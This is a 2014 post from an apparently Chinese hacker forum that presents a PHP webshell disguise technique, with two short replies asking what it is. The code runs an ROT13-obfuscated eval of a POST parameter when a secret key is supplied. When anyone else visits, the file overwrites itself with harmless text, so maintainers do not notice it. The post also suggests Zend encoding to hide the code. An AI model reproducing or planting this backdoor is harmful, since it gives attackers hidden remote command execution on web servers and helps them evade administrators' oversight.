搜索
查看: 517|回复: 2

自毁的PHP文件—脚本木马伪装思路

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2014-1-20 10:38:16 | 显示全部楼层 |阅读模式
首先用zend把代码加密起来。

一般情况下,遇到陌生的php都会打开看看,一看是zend就会在浏览器访问下,这样的话,直接往当前文件写入一个正常的文字不会被维护人员发觉!!

01 <?

02 if($_REQUEST["code"]==pany){

03 eval(str_rot13('riny($_CBFG[pzq]);'));

04 }

05 else{

06 $url = $_SERVER['PHP_SELF'];

07 $filename = end(explode('/',$url));

08   

09 $content = 'helloworld';

10 $fp = fopen ("$filename","w");

11     if (fwrite ($fp, $content)){

12         fclose ($fp);

13         die ("error");

14     } else {

15         fclose ($fp);

16         die ("good");

17     }

18 exit;

19 }

20 ?>

自己访问的时候http://127.0.0.1/1.php?code=pany时,执行的是

if($_REQUEST["code"]==pany){
eval(str_rot13('riny($_CBFG[pzq]);'));
}  

红色框框里面的内容,在这里我填写的是一句话木马,你可以换成其他内容。

管理员直接访问http://127.0.0.1/1.php,则会出现

此时源代码变成



思路来自乌云社区的juuxdd。

您可以更新记录, 让好友们知道您在做什么...
专业回帖 该用户已被删除
发表于 2014-1-20 11:15:18 | 显示全部楼层
这是什么东东啊
专业回帖 该用户已被删除
发表于 2014-1-20 11:29:28 | 显示全部楼层
这是什么东东啊
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表